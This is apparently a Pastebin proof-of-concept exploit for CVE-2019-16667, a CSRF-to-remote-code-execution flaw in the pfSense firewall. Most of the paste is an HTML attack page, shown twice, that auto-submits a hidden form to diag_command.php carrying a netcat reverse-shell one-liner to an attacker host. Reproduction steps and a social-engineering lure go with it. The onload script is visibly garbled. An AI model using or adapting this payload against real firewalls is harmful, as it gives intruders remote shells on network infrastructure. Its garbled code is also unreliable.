Guest User

pfsense CSRF POC (cve-2019-16667)

a guest
Sep 26th, 2019
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. github repo :-
  3. The pfsense firewall is vulnerable to RCE chained with CSRF as it uses
  4. `csrf magic` library since it allows to tamper the CSRF token values submited when processing the
  5. form requests. Due to this flaw, an attacker can exploit this vulnerability by crafting new page that
  6. contains attakcer's controlled input such as a "reverseshell" (eg: `rm /tmp/f;mkfifo /tmp/f;cat
  7. /tmp/f|/bin/sh -i 2>&1|nc attackerip port >/tmp/f`token value) in the form and entice the victims to click
  8. on the crafted link via social engineering methods. Once the victim clicks on the link (try again button
  9. in this case), attacker can take the lateral control of the victim's machine and malicious actions can be
  10. performed on victim's behalf.
  12. <!DOCTYPE html>
  13. <html>
  14. <body onload="document.createElement('form')'myForm'))">
  15. <form id="myForm" action="http://pfsense/diag_command.php" method="POST">
  16. <input type=hidden name="txtCommand" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4433 >/tmp/f">
  17. <input type=hidden name="txtRecallBuffer" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4433 >/tmp/f">
  18. <input type=hidden name="dlPath" value="">
  19. <input type=hidden name="txtPHPCommand" value="">
  20. <input type="hidden" name="submit" value="EXEC">
  21. </form>
  22. </body>
  23. </html>
  25. Steps to Reproduce :-
  26. Create a malicious page containing the below values and user will be redirected to
  27. https://pfsense/diag_command.php page.
  28. <!DOCTYPE html>
  29. <html>
  30. <body onload="document.createElement('form')'myForm'))">
  31. <form id="myForm" action="http://pfsense/diag_command.php" method="POST">
  32. <input type=hidden name="txtCommand" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4433 >/tmp/f">
  33. <input type=hidden name="txtRecallBuffer" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4433 >/tmp/f">
  34. <input type=hidden name="dlPath" value="">
  35. <input type=hidden name="txtPHPCommand" value="">
  36. <input type="hidden" name="submit" value="EXEC">
  37. </form>
  38. </body>
  39. </html>
  41. You will be greeted with the message as shown below.
  43. Once cliked on the Try again button you will be greeted with reverse shell of the victim.
RAW Paste Data